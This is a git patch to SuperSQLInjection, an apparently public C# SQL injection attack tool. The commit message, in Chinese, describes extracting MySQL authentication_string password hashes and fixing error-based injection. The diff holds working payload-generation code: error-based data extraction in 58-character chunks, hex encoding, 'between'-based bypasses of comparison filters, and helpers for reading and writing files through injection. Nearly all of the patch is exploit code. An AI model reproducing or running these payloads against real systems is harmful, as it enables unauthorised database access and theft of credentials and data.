From d27a7b16fbe51b7341de0131ee26536cef0b7f6a Mon Sep 17 00:00:00 2001 From: shack2 <1341413415@qq.com> Date: Thu, 6 Dec 2018 17:58:01 +0800 Subject: [PATCH] 20181206 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 20181206 V1.0 正式版--- 修改mysql获取的环境的配置文件,增加hash字段名为authentication_string的查询。 修复使用了betweent and饶过时,显错注入无法获取数据的情况。 修复MySQL显错注入,获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。 --- SuperSQLInjection/Main.cs | 89 ++++++++++++++-------------- SuperSQLInjection/payload/MySQL.cs | 95 ++++++++++++++++++++++++++---- 2 files changed, 128 insertions(+), 56 deletions(-) diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs index ea04eaa..8a69234 100644 --- a/SuperSQLInjection/Main.cs +++ b/SuperSQLInjection/Main.cs @@ -230,7 +230,7 @@ public static String getSid() return sid; } - public static int version = 20181205; + public static int version = 20181206; public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version; //检查更新 public void checkUpdate() @@ -1760,32 +1760,28 @@ public void addNodeToTreeList(TreeNode tn, String text, String type) private String ByPassForBetween(String paylaod, int len) { - String newpayload = ""; - if (config.useBetweenByPass == false) + String newpayload = paylaod.Replace("{len}", len + ""); + if(config.useBetweenByPass) { - newpayload = paylaod.Replace("{len}", len + ""); - } - else - { - paylaod = paylaod.Replace("{len}", ""); - if (paylaod.IndexOf(">=") != -1) + + if (newpayload.IndexOf(">=") != -1) { - newpayload = paylaod.Replace(">=", " not between 0 and " + (len - 1)); + newpayload = newpayload.Replace(">=", " not between 0 and " + (len - 1)); } - else if (paylaod.IndexOf(">") != -1) + else if (newpayload.IndexOf(">") != -1) { - newpayload = paylaod.Replace(">", " not between 0 and " + len); + newpayload = newpayload.Replace(">", " not between 0 and " + len); } - else if (paylaod.IndexOf("=") != -1) + else if (newpayload.IndexOf("=") != -1) { - newpayload = paylaod.Replace("=", " between " + len + " and " + len); + newpayload = newpayload.Replace("=", " between " + len + " and " + len); } else if (paylaod.IndexOf("<") != -1) { - newpayload = paylaod.Replace("<", " between 0 and " + len); - } - + newpayload = newpayload.Replace("<", " between 0 and " + len); + } } + return newpayload; } @@ -3862,44 +3858,45 @@ public void getDataValueByErrorByMySQL(Object opam) try { GetDataPam gp = (GetDataPam)opam; + //获取数据长度 - ListViewItem lvi = null; - foreach (String column in gp.columns) - { - //获取数据长度 + String datas_payload_columns = MySQL.hex_value.Replace("{data}", MySQL.creatMySQLColumnsNoConcatStr(gp.columns, gp.table, gp.dbname, gp.limit)); + String datas_payload_length = MySQL.concatMySQLColumn(MySQL.char_length.Replace("{data}", datas_payload_columns)); - String datas_payload_columns = MySQL.creatMySQLColumnStr(column); - String datas_payload_length = MySQL.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)"); + String datas_payload_length_error = MySQL.error_value.Replace("{data}", datas_payload_length); - String d_l_e = MySQL.creatMySQLColumnStr("(" + datas_payload_length + ")"); - String datas_payload_length_error = MySQL.error_value.Replace("{data}", d_l_e); + String result_length = getOneDataByUnionOrError(datas_payload_length_error); - String result_length = getOneDataByUnionOrError(datas_payload_length_error); + int sumlen = Tools.convertToInt(result_length); - int sumlen = Tools.convertToInt(result_length); - String datas_value_payload = "(select " + MySQL.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")"; - String result = ""; - int start = 1; - //每次获取长度,err方式有长度限制 - int count = 64 - 6; - this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info); - while (start < sumlen) - { - //hex编码,防止中文等乱码 - String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count); - String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_column); - result += getOneDataByUnionOrError(c_datas_value_payload); - start += count; - } + String result = ""; + int start = 1; + //每次获取长度,err方式有长度限制59个字符 + int count = 64 - 6; + this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info); + while (start < sumlen) + { + //hex编码,防止中文等乱码 + String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_payload_columns).Replace("{start}", start.ToString()), count); + String c_datas_value_payload = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(datas_value_column)); + result += getOneDataByUnionOrError(c_datas_value_payload); + start += count; + } + + result = Tools.unHex(result, "UTF-8"); + String[] items = Regex.Split(result, "\\$\\$\\$"); + ListViewItem lvi = null; + foreach (String item in items) + { if (lvi == null) { - lvi = new ListViewItem(result); + + lvi = new ListViewItem(item); } else { - lvi.SubItems.Add(result); + lvi.SubItems.Add(item); } - } this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi); this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!", LogLevel.info); @@ -5739,7 +5736,7 @@ public void readOrWriteFile() try { String payload_len = MySQL.char_length.Replace("{data}", data_payload); - String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.creatMySQLColumnStr(payload_len)); + String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(payload_len)); String result_length = getOneDataByUnionOrError(payload_len_error); @@ -5755,7 +5752,7 @@ public void readOrWriteFile() while (start < sumlen) { //hex编码,防止中文等乱码 - String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count); + String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnCastStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count); String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_tmp); result += getOneDataByUnionOrError(c_datas_value_payload); start += count; diff --git a/SuperSQLInjection/payload/MySQL.cs b/SuperSQLInjection/payload/MySQL.cs index 0e23504..9f74e6f 100644 --- a/SuperSQLInjection/payload/MySQL.cs +++ b/SuperSQLInjection/payload/MySQL.cs @@ -106,7 +106,7 @@ public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex, if (i == showIndex) { - sb.Append(creatMySQLColumnStr(columns) + ","); + sb.Append(concatMySQLColumnStr(columns) + ","); } else { @@ -148,7 +148,7 @@ public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,Str if (i == showIndex) { - sb.Append(creatMySQLColumnStr(data) + ","); + sb.Append(concatMySQLColumn(data) + ","); } else { @@ -188,7 +188,7 @@ public static String creatMySQLWriteFileByUnionByMuSQL(String path, String conte public static String creatMySQLColumnsStrByError(List columns, String table, String dbName, int limit) { StringBuilder sb = new StringBuilder(); - sb.Append(creatMySQLColumnStr(columns)); + sb.Append(concatMySQLColumnStr(columns)); if (!Tools.checkEmpty(dbName)) { @@ -216,8 +216,14 @@ public static String creatMySQLColumnsStrByError(List columns, String ta public static String creatMySQLColumnsStrByError(String column, String table, String dbName, int limit) { - StringBuilder sb = new StringBuilder(); - sb.Append(creatMySQLColumnStr(column)); + List List = new List(); + List.Add(column); + return creatMySQLColumnsStrByError(List, table, dbName, limit); + } + public static String creatMySQLColumnsHexStrByError(String column, String table, String dbName, int limit) + { + StringBuilder sb = new StringBuilder("(select "); + sb.Append(creatMySQLColumnHexStr(column)); if (!Tools.checkEmpty(dbName)) { @@ -236,12 +242,49 @@ public static String creatMySQLColumnsStrByError(String column, String table, St } if (limit >= 0) { - sb.Append(" limit " + limit + ",1"); + sb.Append(" limit " + limit + ",1)"); + + } + return sb.ToString(); + } + + public static String creatMySQLColumnsNoConcatStr(List columns, String table, String dbName, int limit) + { + + + StringBuilder sb = new StringBuilder("(select concat("); + foreach (String c in columns) { + sb.Append(c + ",0x242424,"); + } + if (columns.Count > 0) + { + sb.Remove(sb.Length - 10, 10); + } + sb.Append(")"); + if (!Tools.checkEmpty(dbName)) + { + sb.Append(" from " + dbName + "."); + if (!Tools.checkEmpty(table)) + { + sb.Append(table); + } + } + else + { + if (!Tools.checkEmpty(table)) + { + sb.Append(" from " + table); + } + } + if (limit >= 0) + { + sb.Append(" limit " + limit + ",1)"); } return sb.ToString(); } + /// @@ -249,18 +292,18 @@ public static String creatMySQLColumnsStrByError(String column, String table, St /// /// 列明 /// - public static String creatMySQLColumnStr(List columns) + public static String concatMySQLColumnStr(List columns) { StringBuilder sb = new StringBuilder("concat(0x5e5e21,"); for (int i = 0; i < columns.Count; i++) { if (columns.Count > 1) { - sb.Append("ifnull(cast(" + columns[i] + " as char),0x20),0x242424,"); + sb.Append(columns[i]+",0x242424,"); } else { - return creatMySQLColumnStr(columns[i]); + return concatMySQLColumn(columns[i]); } } @@ -275,12 +318,13 @@ public static String creatMySQLColumnStr(List columns) } + /// /// 生成查询列数据 /// /// 列明 /// - public static String creatMySQLColumnStr(String column) + public static String concatMySQLColumn(String column) { StringBuilder sb = new StringBuilder("concat(0x5e5e21,"); sb.Append(column); @@ -289,5 +333,36 @@ public static String creatMySQLColumnStr(String column) } + /// + /// 生成查询列数据 + /// + /// 列明 + /// + public static String creatMySQLColumnCastStr(String column) + { + StringBuilder sb = new StringBuilder("concat(0x5e5e21,"); + sb.Append("ifnull(cast(" + column + " as char),0x20)"); + sb.Append(",0x215e5e)"); + return sb.ToString(); + + } + + /// + /// 生成查询列数据 + /// + /// 列明 + /// + public static String creatMySQLColumnHexStr(String column) + { + StringBuilder sb = new StringBuilder("concat(0x5e5e21,"); + sb.Append(hex_value.Replace("{data}",column)); + sb.Append(",0x215e5e)"); + return sb.ToString(); + + } + + + + } }